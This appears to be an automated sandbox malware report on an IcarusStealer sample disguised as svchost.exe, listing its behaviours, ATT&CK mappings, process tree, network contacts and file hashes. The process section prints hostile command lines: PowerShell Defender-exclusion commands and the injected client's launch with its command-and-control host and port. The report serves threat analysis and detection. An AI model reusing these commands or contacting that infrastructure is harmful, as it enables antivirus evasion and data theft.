Malware Analysis Report

2024-08-06 08:21

Sample ID 240309-swressbg6z
Target svchost.exe
SHA256 ade93fc6c27fa1b57d864ebbcea4cec99bfb8556115496051bc8a10b0efde04d
Tags
icarusstealer persistence stealer
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK Matrix

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

ade93fc6c27fa1b57d864ebbcea4cec99bfb8556115496051bc8a10b0efde04d

Threat Level: Known bad

The file svchost.exe was found to be: Known bad.

Malicious Activity Summary

icarusstealer persistence stealer

IcarusStealer

Modifies Installed Components in the registry

Checks computer location settings

Executes dropped EXE

Legitimate hosting services abused for malware hosting/C2

Looks up external IP address via web service

Enumerates connected drives

Suspicious use of SetThreadContext

Unsigned PE

Enumerates physical storage devices

Modifies registry class

Suspicious use of SetWindowsHookEx

Suspicious use of WriteProcessMemory

Suspicious use of SendNotifyMessage

Suspicious use of FindShellTrayWindow

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: EnumeratesProcesses

MITRE ATT&CK Matrix V13

Initial Access
TA0001
Execution
TA0002
Persistence
TA0003
Boot or Logon Autostart Execution
T1547
Registry Run Keys / Startup Folder
T1547.001
Privilege Escalation
TA0004
Boot or Logon Autostart Execution
T1547
Registry Run Keys / Startup Folder
T1547.001
Defense Evasion
TA0005
Modify Registry
T1112
Credential Access
TA0006
Discovery
TA0007
Query Registry
T1012
System Information Discovery
T1082
Peripheral Device Discovery
T1120
Lateral Movement
TA0008
Collection
TA0009
Exfiltration
TA0010
Command and Control
TA0011
Web Service
T1102
Impact
TA0040
Resource Development
TA0042
Reconnaissance
TA0043

Analysis: static1

Detonation Overview

Reported

2024-03-09 15:28

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-03-09 15:28

Reported

2024-03-09 15:30

Platform

win10v2004-20240226-en

Max time kernel

7s

Max time network

62s

Command Line

"C:\Users\Admin\AppData\Local\Temp\svchost.exe"

Signatures

IcarusStealer

stealer icarusstealer

Modifies Installed Components in the registry

persistence
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-2727153400-192325109-1870347593-1000\Software\Microsoft\Active Setup\Installed Components C:\Windows\explorer.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-2727153400-192325109-1870347593-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\svchost.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Start.exe N/A

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\D: C:\Windows\explorer.exe N/A
File opened (read-only) \??\F: C:\Windows\explorer.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ipinfo.io N/A N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 3368 set thread context of 220 N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe

Enumerates physical storage devices

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ C:\Windows\explorer.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2727153400-192325109-1870347593-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ C:\Windows\explorer.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-2727153400-192325109-1870347593-1000\{506CF92D-2348-44C8-A7CA-5CFD619112B9} C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2727153400-192325109-1870347593-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2727153400-192325109-1870347593-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2727153400-192325109-1870347593-1000_Classes\Local Settings C:\Windows\explorer.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2727153400-192325109-1870347593-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots C:\Windows\explorer.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2727153400-192325109-1870347593-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff C:\Windows\explorer.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Start.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Start.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Start.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\explorer.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\explorer.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\explorer.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\explorer.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\explorer.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\explorer.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\explorer.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Start.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3368 wrote to memory of 4472 N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
PID 3368 wrote to memory of 4472 N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
PID 3368 wrote to memory of 4472 N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
PID 4472 wrote to memory of 2204 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 4472 wrote to memory of 2204 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 4472 wrote to memory of 2204 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 3368 wrote to memory of 800 N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe C:\Windows\explorer.exe
PID 3368 wrote to memory of 800 N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe C:\Windows\explorer.exe
PID 3368 wrote to memory of 2612 N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 3368 wrote to memory of 2612 N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 3368 wrote to memory of 2612 N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 3368 wrote to memory of 220 N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 3368 wrote to memory of 220 N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 3368 wrote to memory of 220 N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 3368 wrote to memory of 220 N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 3368 wrote to memory of 220 N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 3368 wrote to memory of 220 N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 3368 wrote to memory of 220 N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 3368 wrote to memory of 220 N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 3368 wrote to memory of 1660 N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe C:\Windows\SysWOW64\cmd.exe
PID 3368 wrote to memory of 1660 N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe C:\Windows\SysWOW64\cmd.exe
PID 3368 wrote to memory of 1660 N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe C:\Windows\SysWOW64\cmd.exe
PID 220 wrote to memory of 4644 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\SysWOW64\cmd.exe
PID 220 wrote to memory of 4644 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\SysWOW64\cmd.exe
PID 220 wrote to memory of 4644 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\SysWOW64\cmd.exe
PID 220 wrote to memory of 4076 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\SysWOW64\cmd.exe
PID 220 wrote to memory of 4076 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\SysWOW64\cmd.exe
PID 220 wrote to memory of 4076 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\SysWOW64\cmd.exe
PID 1660 wrote to memory of 544 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\Start.exe
PID 1660 wrote to memory of 544 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\Start.exe
PID 4644 wrote to memory of 3880 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4644 wrote to memory of 3880 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4644 wrote to memory of 3880 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4076 wrote to memory of 2896 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4076 wrote to memory of 2896 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4076 wrote to memory of 2896 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Processes

C:\Users\Admin\AppData\Local\Temp\svchost.exe

"C:\Users\Admin\AppData\Local\Temp\svchost.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\20elnnae\20elnnae.cmdline"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES75FB.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCADAA17DA99B940328E167AEB45BAC584.TMP"

C:\Windows\explorer.exe

"C:\Windows\explorer.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" ICARUS_Client case-shield.gl.at.ply.gg 26501 PUGlcQLxe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" ICARUS_Client case-shield.gl.at.ply.gg 26501 PUGlcQLxe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe & exit

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /k start /b C:\Users\Admin\AppData\Local\Temp\Start.exe & exit

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath cvtres.exe & exit

C:\Users\Admin\AppData\Local\Temp\Start.exe

C:\Users\Admin\AppData\Local\Temp\Start.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath cvtres.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\system32\taskmgr.exe

"C:\Windows\system32\taskmgr.exe" /4

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

Network

Country Destination Domain Proto
US 8.8.8.8:53 241.150.49.20.in-addr.arpa udp
US 8.8.8.8:53 138.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 raw.githubusercontent.com udp
US 185.199.111.133:443 raw.githubusercontent.com tcp
US 8.8.8.8:53 133.111.199.185.in-addr.arpa udp
US 8.8.8.8:53 241.154.82.20.in-addr.arpa udp
US 8.8.8.8:53 case-shield.gl.at.ply.gg udp
US 147.185.221.17:26501 case-shield.gl.at.ply.gg tcp
US 8.8.8.8:53 17.221.185.147.in-addr.arpa udp
US 8.8.8.8:53 ipinfo.io udp
US 8.8.8.8:53 69.31.126.40.in-addr.arpa udp
US 8.8.8.8:53 43.58.199.20.in-addr.arpa udp
US 34.117.186.192:80 ipinfo.io tcp
US 8.8.8.8:53 192.186.117.34.in-addr.arpa udp
US 8.8.8.8:53 41.110.16.96.in-addr.arpa udp
US 8.8.8.8:53 26.165.165.52.in-addr.arpa udp
US 8.8.8.8:53 104.219.191.52.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 217.135.221.88.in-addr.arpa udp
US 8.8.8.8:53 28.118.140.52.in-addr.arpa udp

Files

memory/3368-0-0x0000000075150000-0x0000000075900000-memory.dmp

memory/3368-1-0x0000000000590000-0x0000000000612000-memory.dmp

memory/3368-2-0x00000000054C0000-0x000000000555C000-memory.dmp

memory/3368-3-0x0000000005560000-0x00000000055F2000-memory.dmp

memory/3368-4-0x00000000071C0000-0x0000000007764000-memory.dmp

\??\c:\Users\Admin\AppData\Local\Temp\20elnnae\20elnnae.cmdline

MD5 80e5e8cec2758009460e985a799ca6b4
SHA1 89fc0e1ac64a3d23ee2e83086957e63dd5b7cd2e
SHA256 ecedde26d1fb9ab58e2e3b8cfbb41514cd629c0e531049bc0c1b0ee402465595
SHA512 becc050e4a07eec5710f59e371bd8653b0274f84e9323ac7509f6895fba6ad69c082deae3bd7ed68428a8b1487a016f3e169c846836c88c4c47eb52d3db110a2

\??\c:\Users\Admin\AppData\Local\Temp\20elnnae\20elnnae.0.cs

MD5 14846c9faaef9299a1bf17730f20e4e6
SHA1 8083da995cfaa0e8e469780e32fcff1747850eb6
SHA256 61bc7b23a430d724b310e374a67a60dd1e1f883c6dd3a98417c8579ba4973c1b
SHA512 549d99dbb7376d9d6106ad0219d6cf22eb70c80d54c9ad8c7d0b04a33d956515e55c9608ab6eec0733f2c23602867eb85b43e58200ded129958c7de7ed22efb1

\??\c:\Users\Admin\AppData\Local\Temp\CSCADAA17DA99B940328E167AEB45BAC584.TMP

MD5 810535a8ae563d6aa53635a1bb1206ff
SHA1 f5ba39f1a455eb61efe5022b524892249ee75dce
SHA256 7f2c2a29a5f1c0d994fa4c2fccc11a8f3f5f5d4d97ada18aea94971664c8992f
SHA512 5662b39b29d33bff2e8de4cf3878a6e58b7a163cc93311f4c82f03e73b239a76bb9064ed0c4a6d01cceb858663462345cae78999cfa3668ef975cf85dfff138d

C:\Users\Admin\AppData\Local\Temp\RES75FB.tmp

MD5 c94fa213d51f3046b4fee71f216be2fe
SHA1 d4b4e1cd9d16184d2ff5d687c13f3915f5d97e51
SHA256 52e15efb7ab936117b0424adf8df1ed4a0d346746097de7d525752d1cb455c0d
SHA512 07963f3c03c6de7759d2043fb5b62313a0c056de8570dc1ae636a4f61f3c3c8f74279be90d941c485df1a5972a000921b1083a2b2ec5f303e6169d8bf158f8c8

memory/220-17-0x0000000000400000-0x0000000000424000-memory.dmp

memory/220-18-0x0000000075150000-0x0000000075900000-memory.dmp

memory/220-19-0x0000000005580000-0x0000000005590000-memory.dmp

memory/3368-21-0x0000000075150000-0x0000000075900000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Start.exe

MD5 65553b8955e11c0813ae56b6502071fe
SHA1 48ca68eb75a01f6a5e4329addb9b5b4b7bf98b4c
SHA256 647fffa6f573e913ec1f26b43fcf731e48e2d307f45f023c66d49d71240623f8
SHA512 ca9403803be7c0b07c39a12faca0aa3043507c1adae4bafb570868a9e6f8548786222e3c3d4c8724ffec10011035fa354318857864a4b4c97701d5d9650ebef8

memory/544-25-0x0000000000DC0000-0x0000000000DC8000-memory.dmp

memory/2896-26-0x0000000003360000-0x0000000003396000-memory.dmp

memory/544-28-0x00007FFE86B90000-0x00007FFE87651000-memory.dmp

memory/3880-29-0x0000000004530000-0x0000000004540000-memory.dmp

memory/2896-27-0x0000000005A80000-0x00000000060A8000-memory.dmp

memory/2896-30-0x0000000075150000-0x0000000075900000-memory.dmp

memory/2896-31-0x0000000005440000-0x0000000005450000-memory.dmp

memory/3880-32-0x0000000004530000-0x0000000004540000-memory.dmp

memory/2896-33-0x0000000005440000-0x0000000005450000-memory.dmp

memory/3880-34-0x0000000075150000-0x0000000075900000-memory.dmp

memory/2896-35-0x00000000059C0000-0x00000000059E2000-memory.dmp

memory/3880-36-0x00000000053F0000-0x0000000005456000-memory.dmp

memory/3880-37-0x0000000005460000-0x00000000054C6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_12weuq1l.24h.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3880-56-0x00000000054D0000-0x0000000005824000-memory.dmp

memory/2896-59-0x0000000006960000-0x000000000697E000-memory.dmp

memory/2896-60-0x0000000006A10000-0x0000000006A5C000-memory.dmp

memory/3880-61-0x0000000004530000-0x0000000004540000-memory.dmp

memory/3880-66-0x000000007F770000-0x000000007F780000-memory.dmp

memory/3880-68-0x00000000701D0000-0x000000007021C000-memory.dmp

memory/3880-67-0x0000000006A40000-0x0000000006A72000-memory.dmp

memory/2896-84-0x00000000701D0000-0x000000007021C000-memory.dmp

memory/4276-83-0x000001717E540000-0x000001717E560000-memory.dmp

memory/3880-82-0x0000000006A80000-0x0000000006B23000-memory.dmp

memory/3880-80-0x0000000006060000-0x000000000607E000-memory.dmp

memory/2896-70-0x000000007EE90000-0x000000007EEA0000-memory.dmp

memory/4276-87-0x000001717E8C0000-0x000001717E8E0000-memory.dmp

memory/800-85-0x0000000003680000-0x0000000003681000-memory.dmp

memory/4276-98-0x000001717D7D0000-0x000001717D7F0000-memory.dmp

memory/3880-108-0x0000000007420000-0x0000000007A9A000-memory.dmp

memory/3880-109-0x0000000006DE0000-0x0000000006DFA000-memory.dmp

memory/220-110-0x0000000075150000-0x0000000075900000-memory.dmp

memory/3880-111-0x0000000006E60000-0x0000000006E6A000-memory.dmp

memory/3880-112-0x0000000007050000-0x00000000070E6000-memory.dmp

memory/2896-113-0x0000000007E90000-0x0000000007EA1000-memory.dmp

memory/3880-114-0x0000000007010000-0x000000000701E000-memory.dmp

memory/3880-115-0x0000000007020000-0x0000000007034000-memory.dmp

memory/3880-116-0x0000000007110000-0x000000000712A000-memory.dmp

memory/2896-117-0x0000000007FB0000-0x0000000007FB8000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

MD5 3d086a433708053f9bf9523e1d87a4e8
SHA1 b3ab5d4f282a4c8fe8c3005b8a557ed5a0e37f28
SHA256 6f8fd1b8d9788ad54eaeee329232187e24b7b43393a01aeba2d6e9675231fb69
SHA512 931ae42b4c68a4507ff2342332b08eb407050d47cf4176137ea022d0f6e513c689e998445a04c6d18d4877391705c586bfce0234632b898d41aaed0957996dfd

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 85f7b21f78ffcce8f30b0589ae6e1578
SHA1 14654f7fbc30e5e58d9bb6fa57360d3458fdc484
SHA256 e1365c3babc0f5f8487ad855a43970d8dba206eb3fc6b01ab9132a5c5813629f
SHA512 11ec10dc0eb87ea219b905f079c407eba390ec9b2c0399cb3f6e2014a0db2ac88c673b5d8a9b616338a3bdc4d2ed1dde432bf2fdae207210eca31dbcce4e15c1

memory/3880-123-0x0000000075150000-0x0000000075900000-memory.dmp

memory/2896-124-0x0000000075150000-0x0000000075900000-memory.dmp

C:\Users\Admin\AppData\Local\Packages\microsoft.windows.search_cw5n1h2txyewy\AC\Microsoft\Internet Explorer\DOMStore\1HCECE5V\microsoft.windows[1].xml

MD5 6583a2f89cc3c90f77ffa922acf7ee63
SHA1 eccd205c1bb4764f160e86cfd0d860976c32708f
SHA256 34cbdb325cf0420e4bfbc19da431b639890b153b6ac0635ce79ba37ffc677ac2
SHA512 0c7daec9157074607177f75d7ccf190027d9e1830d832cbf16426bfcf221258db4fba74ee35f20c85a9bd6022a1db0409a2f3ec84ecc7317142cf9759eead021

memory/4084-132-0x00000211C4730000-0x00000211C4750000-memory.dmp

memory/4084-134-0x00000211C46F0000-0x00000211C4710000-memory.dmp

memory/4084-137-0x00000211C4D00000-0x00000211C4D20000-memory.dmp

memory/3004-153-0x0000021F46E00000-0x0000021F46E20000-memory.dmp

memory/3004-157-0x0000021F46DC0000-0x0000021F46DE0000-memory.dmp

memory/3004-159-0x0000021F471E0000-0x0000021F47200000-memory.dmp

memory/220-167-0x0000000005580000-0x0000000005590000-memory.dmp

memory/544-168-0x00007FFE86B90000-0x00007FFE87651000-memory.dmp

memory/4724-169-0x0000014FC7560000-0x0000014FC7561000-memory.dmp

memory/4724-171-0x0000014FC7560000-0x0000014FC7561000-memory.dmp

memory/4724-170-0x0000014FC7560000-0x0000014FC7561000-memory.dmp

memory/4724-175-0x0000014FC7560000-0x0000014FC7561000-memory.dmp

memory/4724-176-0x0000014FC7560000-0x0000014FC7561000-memory.dmp

memory/4724-177-0x0000014FC7560000-0x0000014FC7561000-memory.dmp

memory/4724-178-0x0000014FC7560000-0x0000014FC7561000-memory.dmp

memory/4724-179-0x0000014FC7560000-0x0000014FC7561000-memory.dmp

memory/4724-180-0x0000014FC7560000-0x0000014FC7561000-memory.dmp

memory/4724-181-0x0000014FC7560000-0x0000014FC7561000-memory.dmp

memory/712-189-0x000002A77ECD0000-0x000002A77ECF0000-memory.dmp

memory/712-191-0x000002A77EC90000-0x000002A77ECB0000-memory.dmp

memory/712-193-0x000002A77F0B0000-0x000002A77F0D0000-memory.dmp

memory/5192-210-0x0000015CD6EB0000-0x0000015CD6ED0000-memory.dmp

memory/5192-212-0x0000015CD6E70000-0x0000015CD6E90000-memory.dmp

memory/5192-214-0x0000015CD7480000-0x0000015CD74A0000-memory.dmp

memory/5624-231-0x000002006C320000-0x000002006C340000-memory.dmp

memory/5624-233-0x000002006BFD0000-0x000002006BFF0000-memory.dmp

memory/5624-235-0x000002006C6F0000-0x000002006C710000-memory.dmp

memory/6000-252-0x000001E2A9860000-0x000001E2A9880000-memory.dmp